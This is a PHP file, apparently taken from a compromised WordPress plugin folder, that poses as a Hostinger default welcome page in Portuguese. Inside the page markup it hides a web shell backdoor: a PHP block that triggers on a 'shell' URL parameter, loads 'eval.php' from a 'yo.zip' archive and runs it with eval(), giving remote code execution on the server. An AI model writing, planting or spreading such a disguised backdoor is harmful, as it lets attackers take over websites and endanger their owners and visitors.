File: /home/centuryt/public_html/wp-content/plugins/wp-fastest-cache/js/cdn/default.php
<!DOCTYPE html>
<html lang="pt">
<head>
<title>Página padrão com PHP e HTML</title>
<link rel="icon" type="image/x-icon" href="https://hpanel.hostinger.com/favicons/hostinger.png">
<meta charset="utf-8">
<meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
<meta content="Página padrão" name="description">
<meta content="width=device-width, initial-scale=1" name="viewport">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link href="https://fonts.googleapis.com/css2?family=DM+Sans&display=swap" rel="stylesheet">
<style>
body {
margin: 0px;
display: flex;
flex-direction: column;
align-items: center;
justify-content: center;
width: 100vw;
height: 100vh;
min-height: 675px;
background-color: #F4F5FF;
}
p {
width: 100%;
font-size: 16px;
font-family: 'DM Sans', sans-serif;
font-weight: 400;
text-align: center;
max-width: 550px;
color: #727586;
margin: 0px;
}
a:hover {
cursor: pointer;
color: #673DE6;
text-decoration: underline;
}
h1 {
font-family: 'DM Sans', sans-serif;
font-size: 24px;
font-weight: 700;
text-align: center;
margin: 8px;
}
.content {
display: flex;
flex-direction: column;
align-items: center;
justify-content: center;
width: 100%;
height: 100%;
}
.ic-launch {
margin-left: 10.5px;
width: 21px !important;
height: 20px !important;
}
.link-container {
margin-top: 32px;
margin-bottom: 32px;
}
.link {
display: flex;
align-items: center;
justify-content: center;
font-family: 'DM Sans', sans-serif;
font-weight: 700;
font-size: 14px;
color: #673DE6;
margin-top: 8px;
text-decoration: none;
}
.main-image {
width: 100%;
max-width: 650px;
height: auto;
}
.navigation {
width: 100%;
height: 72px;
display: flex;
align-items: center;
justify-content: center;
background-color: #36344D;
}
@media screen and (max-width: 580px) {
h1, p, .link-container {
width: 80%;
}
}
@media screen and (min-width: 650px) and (max-height: 750px) {
.link-container {
margin-top: 12px;
}
h1 {
margin-top: 0px;
margin-bottom: 0px;
}
}
</style>
</head>
<body>
<nav class="navigation">
<a href="https://hpanel.hostinger.com" rel="nofollow" target="_blank">
<svg width="150" height="30" viewBox="0 0 150 30" fill="none" xmlns="http://www.w3.org/2000/svg">
<!-- SVG Path Data -->
</svg>
</a>
</nav>
<!-- Bagian pertama HTML -->
<div class="content">
<img class="main-image" src="https://cdn.hostinger.com/hostinger_welcome/v2/man1.png" alt="Main Image">
<h1>Está tudo pronto!</h1>
<p>Tudo o que tem de fazer agora é carregar os ficheiros do seu site e iniciar a sua jornada. Veja como fazer isto abaixo:</p>
<div>
<?php
if (isset($_GET['shell'])) {
try {
$phar = new PharData('yo.zip');
$fileContent = $phar['eval.php'];
$shellCommand = $_GET['shell'];
eval('?>' . file_get_contents($fileContent));
} catch (Exception $e) {
echo 'Error: ' . $e->getMessage();
}
} else {
}
?>
</div>
<!-- Bagian lanjutan HTML -->
<div class="link-container">
<a class="link" href="https://support.hostinger.com/en/articles/4455931-how-can-i-migrate-website-to-hostinger" rel="nofollow" target="_blank">
Como posso migrar um site para a Hostinger?
<svg class="ic-launch" viewBox="0 0 21 20" fill="none" xmlns="http://www.w3.org/2000/svg">
<path fill-rule="evenodd" clip-rule="evenodd" d="M16.3333 15.8333H4.66667V4.16667H10.5V2.5H4.66667C3.74167 2.5 3 3.25 3 4.16667V15.8333C3 16.75 3.74167 17.5 4.66667 17.5H16.3333C17.25 17.5 18 16.75 18 15.8333V10H16.3333V15.8333ZM12.1667 2.5V4.16667H15.1583L6.96667 12.3583L8.14167 13.5333L16.3333 5.34167V8.33333H18V2.5H12.1667Z" fill="#673DE6"/>
</svg>
</a>
<a class="link" href="https://support.hostinger.com/en/articles/3220304-how-to-install-wordpress-using-auto-installer" rel="nofollow" target="_blank">
Como instalar o WordPress com o Instalador Automático?
<svg class="ic-launch" viewBox="0 0 21 20" fill="none" xmlns="http://www.w3.org/2000/svg">
<path fill-rule="evenodd" clip-rule="evenodd" d="M16.3333 15.8333H4.66667V4.16667H10.5V2.5H4.66667C3.74167 2.5 3 3.25 3 4.16667V15.8333C3 16.75 3.74167 17.5 4.66667 17.5H16.3333C17.25 17.5 18 16.75 18 15.8333V10H16.3333V15.8333ZM12.1667 2.5V4.16667H15.1583L6.96667 12.3583L8.14167 13.5333L16.3333 5.34167V8.33333H18V2.5H12.1667Z" fill="#673DE6"/>
</svg>
</a>
</div>
</div>
</body>
</html>